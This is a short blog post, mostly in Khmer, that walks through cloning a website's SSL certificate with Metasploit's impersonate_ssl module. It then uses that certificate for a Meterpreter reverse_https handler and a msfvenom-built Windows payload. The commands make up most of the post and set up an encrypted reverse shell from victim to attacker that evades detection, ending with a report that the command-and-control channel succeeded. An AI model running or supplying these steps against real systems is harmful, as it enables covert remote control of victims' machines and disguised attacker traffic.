This page looks best with JavaScript enabled

Impersonate SSL - MSF Bypass Detection

 ·  β˜• 1 min read  ·  🐱 thik

Clone SSL Certification

αžαžΎαž’αŸ’αž“αž€αžŠαžΉαž„αž‘αŸαžαžΆ αž™αžΎαž„αž’αžΆαž…αž’αŸ’αžœαžΎαž€αžΆαžšαžαžαž…αž˜αŸ’αž›αž„αž“αžΌαžœαžšαžΆαž›αŸ‹αž―αž€αžŸαžΆαžš SSL Certificate αžšαž”αžŸαŸ‹αž‚αŸαž αž‘αŸ†αž–αŸαžšαžŠαž‘αŸƒαž”αžΆαž“ αžŠαŸ„αž™αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ Module αž˜αž½αž™αž“αŸ…αž€αŸ’αž“αž»αž„ Metasploit Framework αžŠαŸ‚αž›αžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αž„αŸ’αž€αžΎαžαž‘αžΎαž„αžŠαŸ„αž™αž›αŸ„αž€ Chris John Riley αŸ” αž―αž€αžŸαžΆαžšαžŠαŸ‚αž›αžαŸ’αžšαžΌαžœαž”αžΆαž“αžαžαž…αž˜αŸ’αž›αž„αž“αŸ„αŸ‡ αž“αžΉαž„αžαŸ’αžšαžΌαžœαžšαž€αŸ’αžŸαžΆαž‘αž»αž€αž‡αžΆαž”αŸ’αžšαž—αŸαž‘αž‘αž˜αŸ’αžšαž„αŸ‹αž―αž€αžŸαžΆαžš PEM αž αžΎαž™αžœαžΆαž€αŸαž’αžΆαž…αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž”αžΆαž“αž‚αŸ’αžšαž”αŸ‹αž”αŸ’αžšαž—αŸαž‘ Modules αž“αŸ…αž€αŸ’αž“αž»αž„ Metasploit αž•αž„αžŠαŸ‚αžšαŸ”

αžŠαžΎαž˜αŸ’αž”αžΈαžαžαž…αž˜αŸ’αž›αž„ αž™αžΎαž„αž’αžΆαž…αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαžŠαžΌαž…αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

1
2
3

use auxiliary/gather/impersonate_ssl
set rhosts https://example.com/
exploit

SSL certificate cloning

αžŠαžΌαž…αžŠαŸ‚αž›αžšαžΌαž”αž”αžΆαž“αž”αž„αŸ’αž αžΆαž‰αžαžΆαž„αž›αžΎ αž‚αžΊαž™αžΎαž„αž”αžΆαž“αžαžαž…αž˜αŸ’αž›αž„αž―αž€αžŸαžΆαžš Certificate αž”αžΆαž“αžŸαž˜αŸ’αžšαŸαž…αŸ”

Meterpreter Using SSL Connection

αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž“αŸαŸ‡αž‚αžΊαž‡αžΆαž€αžΆαžšαžŸαžΆαž€αž›αŸ’αž”αž„αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ SSL Certificate αžŠαŸ‚αž›αž”αžΆαž“αžαžαž…αž˜αŸ’αž›αž„αž“αŸ„αŸ‡αž˜αž€αž—αŸ’αž‡αžΆαž”αŸ‹αž‘αŸ†αž“αžΆαž€αŸ‹αž‘αŸ†αž„αžšαžœαžΆαž„ Attacker PC αž“αž·αž„ Victim PC αžŠαŸ„αž™αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ Reverse Shell αž‡αžΆαž”αŸ’αžšαž—αŸαž‘ HTTPS αŸ”

αž”αžΎαž€αž…αžΌαž›αž•αŸ’αž‘αžΆαŸ†αž„ Terminal αž“αŸƒ Metasploit Framework αžšαž½αž…αž”αž‰αŸ’αž…αžΌαž›αž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαžŠαžΌαž…αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

1
2
3
4
5
6
7

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.xxx.xxx
set lport xxx
set stagerverifysslcert true
set handlersslcert /xxx/xxx/xxx/cert.pem
exploit

Generate HTTPS Malicious Payload

αž”αž„αŸ’αž€αžΎαžαž˜αŸαžšαŸ„αž‚αžαžΆαž˜αžšαž™αŸˆ Msfvenom αž“αž·αž„αž‡αŸ’αžšαžΎαžŸαžšαžΎαžŸ HTTPS Reverse Shell αŸ”

1

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.xxx.xxx lport=xxx -f exe -b '\x00' -o ~/Desktop/s0rry.exe

Generate Payload

Exploited

αžŸαžΆαž€αž›αŸ’αž”αž„αž”αžΎαž€αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž˜αŸαžšαŸ„αž‚αž€αŸ’αž“αž»αž„αž”αŸ’αžšαž–αŸαž“αŸ’αž’αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΈαž“αžŠαžΌαŸ”

Exploited

αž‡αŸ„αž‚αž‡αŸαž™!!! C2 αž–αŸαž›αž“αŸαŸ‡αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž“αŸ…αž›αžΎ SSL Encryption αŸ•

Share on
Thik
WRITTEN BY
thik
Security Researcher

See Also